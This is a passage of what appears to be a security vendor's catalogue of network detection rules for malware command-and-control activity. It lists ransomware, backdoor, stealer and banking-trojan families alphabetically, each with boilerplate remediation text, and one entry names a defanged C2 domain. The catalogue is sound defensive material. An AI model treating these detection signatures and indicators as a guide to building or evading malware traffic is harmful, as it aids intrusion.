ET MALWARE Aurora/OneKeyLocker Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Aurora Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE AutoHotkey Downloader Checkin via IPLogger

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AutoHotKey offthewall Downloader Requesting Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aveo C2 Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aveo C2 Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aveo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Avzhan DDoS Bot User-Agent MyIE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.2 Server Response M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.2 Server Response M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.2 Server Response M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.3 Server Response M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.3 Server Response M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.3 Server Response M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult Variant.4 Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Babar POST Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Babax Stealer Exfil via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BabyShark CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BACKCONFIG CnC Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Darpapox/Jaku Initial C2 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Egobot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Elise CnC Beacon 1 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 2 M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 3 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 3 M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise Style IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Elise Style IP Check M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Esion CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Graybird Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Irc.MFV User Agent Detected (IRC-U)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor Lanfiltrator Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Meciv Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.TurlaCarbon.A C2 HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Agent.bjjv Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Agent.myttae User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Aldibot.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Aldibot.A User-Agent (Aldi Bot)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Etumbot.B Requesting RC4 Key

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Ixeshe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Likseput.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Likseput.A Checkin Windows Vista/7/8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Momibot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Momibot Ping Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/PcClient.AA Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.PEx.942728546 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Pushdo.s Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Pushdo.s Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.RShot HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Sykipot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Sykipot Get Config Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Sykipot Put

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Trup.CX Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Vertexbot.A User-Agent (VERTEXNET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Xtrat Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backoff POS Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BackSwap Trojan C2 Domain Observed (debasuin .nl in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BadPatch CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BadRabbit Ransomware Activity Via WebDAV (cscc)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE BadRabbit Ransomware Activity Via WebDAV (infpub)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Baldr Stealer Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BalkanDoor CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BalkanDoor CnC Checkin - Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bamital Headers - Likely CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bancos/Banker Info Stealer Post

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BandarChor/CryptON Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE BandarChor Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Banker.anv Generally Suspicious User-Agent (CustomExchangeBrowser)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker/Banbra Related HTTP Post-infection Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker/Banbra Variant POST via x-www-form-urlencoded

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (hhh)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (Ms)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (Mz)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (MzApp)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker.Delf User-Agent (WINDOWS_LOADS)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker PWS/Infostealer HTTP GET Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banker Trojan (General) HTTP Checkin (vit)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload HTTP Checkin Detected (envia.php)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload POST Checkin (dados)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Banload User-Agent Detected (ExampleDL)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BazaBackdoor Variant CnC Activity M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BazaLoader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BazaLoader CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bazaloader Variant Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bazaloader Variant Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BBSRAT GET request CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BBSRAT POST request CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bebloh connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bedep Connectivity Check M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bedep Connectivity Check M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bedep HTTP POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE BePush/Kilim CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE BePush/Kilim payload retrieval

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BestAntivirus2011 Fake AV reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Betabot Checkin 5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BF Botnet CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bifrose/Cycbot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bifrose/Cycbot Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BigLock Ransomware CnC Activity (id)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE BIOPASS RAT Go Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BIOPASS RAT Python Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bitcoin variant Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bitter APT Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BITTERBUG Checkin

Description
Copy link

